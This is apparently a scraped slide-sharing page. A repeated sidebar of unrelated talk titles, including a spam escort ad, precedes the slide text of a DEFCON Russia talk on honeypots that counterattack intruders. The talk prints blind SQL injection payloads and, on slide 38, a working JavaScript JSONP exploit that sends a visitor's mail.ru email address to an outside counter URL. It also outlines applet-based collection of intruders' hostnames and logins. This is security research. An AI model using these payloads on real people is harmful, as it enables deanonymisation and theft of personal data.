Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxRemote DBA Services
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityWSO2
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 

Último (20)

Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 

Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.

  • 1. Alexey Sintsov @asintsov DEFCON RUSSIA DC#7812 HONEYPOT THAT CAN BITE: REVERSE PENETRATION
  • 2. #WHOAMI • Senior Security Engineer at • Writer at • Ideology and co-organizer of • Co-Founder of ZeroNights
  • 3. #DISCLAIMER • This story is not connected to my EMPLOYER • All LIVE data was got from Q2 2011 – Q3 2012 • It was done only for research purposes. • All data was shared with NOBODY. • Thx to Alexey Tyurin (@antyurin)
  • 4. #WHAT IS IT ABOUT honeypot • Attract attacker‟s attention (to HoneyPot) • Get patterns and actions from an attacker behavior Then Operator can understand what kind of attacker we have, what he can do in the future and etc. After that we can Take some „preventative‟ actions. Example 1. Bot search for PHP LFI bug in PMA Def. actions: 1) Do we have PMA? 2) Are our PMA installation accessible from the Internet? 3) Bug fixed? // but the same we can get from IDS… Example 2. SQLi attempt. Dumping hashes. Def. actions: 1) What kind of SQLi he tried to exploit – let‟s check our web-apps for same SQLi patterns 2) Check hashes in our databases – is it salted? Do we have hashes at all? (or plain text?) 3) Check access to tables , is it possible to get access by using „web‟ account?
  • 5. #WHAT IS IT ABOUT classic… IDS Alert SQLi attempt in some .php Is it vulnerable? What attacker did? Log/traffic analysis Src analysis/ manual validation Who is the attacker? - Was he looking for something special? - Is he going to comeback? - How we should be prepared? Deploy the Incident Response Team © InfoSecReactions By @windsheep_
  • 7. #WHOIS THE ATTACKER Why? I do not care, main task – fix the bug! vs. It‟s interesting, I want to track him!
  • 8. #WHOIS THE ATTACKER Who wants to know… • Enterprise - Who is hunting us like that? (oil‟s sector/big R&D) It is always good to know who has started this activity…. Because if it is just kids, it is one thing, if government or competitors – another thing. • Government - Track cybercrimes - Track another government… cyber war, blah-blah-blah… - etc …
  • 9. #WHOIS THE ATTACKER IDS/Logs • IP address - TOR/(chain of)Proxy/BOTnet • User-Agent - lol We have sniffed got nothing…..
  • 10. #HONEYPOT What I want? • Fast result: attack or false positive? • Is it a targeted attack? Or just a scan from botnet? • Is it a professional or kiddie • Decloaking the attacker • Track the attacker
  • 11. #Offensive “The only real defence is active defence“ © Mao Zedong • Hack your enemy first (aggressive) • Hack your enemy back (defensive)
  • 12. #Offensive Not new… AV/Security companies - to take down botnet: • Hacking C&C • Hacking chain of BOTs • Hacking Admin‟s workstation © Andrzej Dereszowski, SIGNAL 11, CONFIDence, 2010
  • 13. #Offensive We can do more… “Replay back” – answer with the same exploit back to the source: • SSH Brute force attack - if the source has SSH service - replay with the same login/pass -- attacker has already changed password on pwned box • PHP/Perl/Ruby web attacks - if the source has HTTP service - replay back with same URI/payload It is against BOTs, and will not work against real attacker.
  • 14. #Offensive WWW • Is it (the attacker) HUMAN? • Is he using well-know application (browser/plugins)? • Can we EXPLOIT it? Classical ExploitPACK?
  • 15. #Honeypot Skills? Bug  Vulnerability  Exploit  Attack Can be found automatically SHOULD be found during manual tests SHOULD be executed by the attacker with browser! Attacker’s level of skills • Low • Medium • High! • Dangerous, we are doomed!!!11
  • 16. #Honeypot Trap • DIRBuster attack, give them /admin/admin.php But what is the password? // We can detect bruteforce attacks… • /admin/help.php?id=1 <--SQL Injection Get password for admin.php • Login with stolen password to /admin/admin.php • Attack complete!
  • 17. #Honeypot Blind SQL Injection (SQLite) „ - 500 Error. This is a bug „/**/AND/**/ „1‟ /**/like„1‟-- - 200. This is a vulnerability „union/**/select(CASE/**/WHEN/**/ sqlite_version()like'3.%'THEN/**/ select(1)from(lololo)ELSE‟BHEU13‟ END) - 200/500. This is an exploit Skill-O-Meter Additional to Skill-O-Metr • Filtered Symbols, like „space‟ • WAF with small „holes‟ • etc, like CTF tasks or hackquest…
  • 19. #Honeypot …can bite! • For each step we can get: o Human/automated attack (Skill-O-Meter) o The malicious intention of an attacker  WhiteHat will finish after finding a SQLi vulnerability. He will not attempt to get access to forbidden part (admin.php)!  Ok, ok… even if he got access to admin.php he do not try to get „secret.pdf‟ =) • On each step we can bite… o On „attack step‟ we can counterattack…
  • 20. #Counterattack What we can? • Attack his browser/plugins • 1day/0day exploits • Social engineering • Evil Java applet/ActiveX (GUI for administration…) • Honeytokens • Attack his env. using a browser. • Third party services (web-mail/social networks/etc) • Local env. (localhost/dsl-router)
  • 21. #Social Engineering Honeytokens • PDF file with secret information (and with exploit…) • EXE file with secret application (fat client for SCADA…) • etc….
  • 22. #Backdoor… ? No – “detective” • Get jpg/txt/doc files from FS • Get config files (VPN) • Get BSSIDs • Get network/domain configuration • Get traceroute to us • Get DNS to us • Get camera-shot, mic recording • etc…
  • 23.
  • 24. #Target • Reverse DNS channel • ipconfig • tracert • Domain name • Login name • … • DO NOT COLLECT PERSONAL INFO • DO NOT GET ANY DATA FROM HDD • REMOTE CONTROL DISABLED
  • 25. #Results GET requests log It can be WEB proxy or TOR exit point… Data from attacker’s PC
  • 26. #Results Real logins – second names Real host-names and domains Real ISP, IP addresses
  • 27. #Results Write-up about First DCG meeting in Russia… habrahabr.ru  Most technical Russian IT community… Comments…“ If someone wants invite: ‘ or 1=1– “
  • 28. #Hello “Red May” 2011 GET requests log No success with SE or reverse penetration… I am lucky…
  • 29. #Unexpected GET requests log One beautiful Ex-USSR republic… Nothing special… Damn! Special-Super-Secret-Service of beautiful ex-USSR republic… Looks like „service‟ username, not personal… may be it was compromised?
  • 30. #More drama … few hours latter, another intrusion to DCG web-site … from same ex-USSR republic, same city…. … but another subnet … and again – “reverse penetration” Known nickname, you can Google him as know hacker form this ex-USSR republic.. may be he is working for this Secret Service … or compromise this host and use as intermediate…
  • 31. #Results • Whitehat‟s companies – have tested our Applet! • Independent whitehat researchers… • Backdoored government WS…. • Script kiddies…
  • 32. #Conclusion It works! • We got real usernames of those who did not use VMware/and middle hosts • We got real source for those who use VMware/TOR/Proxy and did not use middle hosts • We got intermediate hosts, but we can detect it, end got • We got configured DNS server address • And we got it automatically… The same results possible for honey token/exploit-back techniques… SE: Attacker is not expecting back-attack!
  • 33. #But Some attackers are careful //@ahack_ru had known about Honeypot and Java applet and did not run it… but he was busted anyway!
  • 34. #Can we attack 3rd party services? If user is authenticated on others services HoneyPot Attacker SocialNetwork • Attack begins • CSRF/XSS attack… • Callback with ID…. • Proxy/TOR/VPN – it is not about network! • Works only vs. script-kiddies and whitehats
  • 37. #mail.ru JSONP Hack 1: SSL Hack 2: <iframe src=“data:… By Egor Homakov
  • 38. document.write("<iframe src='data:text/html,<html><body> <script>var sss = document.createElement("script"); sss.src=“ http://swa.mail.ru/cgi-bin/counters?JSONP_call=PortalHeadlineJSONPCallback&132417612 "; function PortalHeadlineJSONPCallback(objFromMail){ var arr1=objFromMail["data"]; var i = new Image(); i.src = "http://defcon-russia.ru/counter.php?"+arr1["email"]; document.body.appendChild(i); }; document.body.appendChild(sss); </script> </body></html>'>"); #mail.ru exploit
  • 39.
  • 41. #Conclusion It works! • We got real emails • We got real names • We can do correlation between two e-mail addresses and Java Applet response • And we got it automatically…
  • 42. #Conclusion Stats! • SQLi attacks - 484 (~1.2 years) • Applet strikes - 52 (~1.2 years) • Mail grabs - 16 (6 month) ~ 17% success
  • 43. #Conclusion Public announcements of DC Rus First meeting Second meeting Sixth meeting announcement, pre-Zeronights era
  • 45. #Moarrrrrrrrr Local env. can be attacked! • Anti DNS pinning / DNS rebinding • XXXSS by Samy Kamkar (Getting BSSIDs…) • CSRF/XSS on any local resources…. • There can be million techniques and tricks for that…
  • 46. #SE – Custom software Anti-Cybercrime Login Detect fraud/hack attempt Classic ActiveX/Java Backdoored ActiveX/Java Work… Error/ Meintance
  • 47. #SE – Custom software Government level • SCADA • Army systems • FSB/KGB/CIA/MI6/… • etc..
  • 48. #SE – Custom software Наши поделки?
  • 49. #Conclusion • Counterattack can work… • Whitehats are LESS carful when testing something… • ???? • Moral/Legal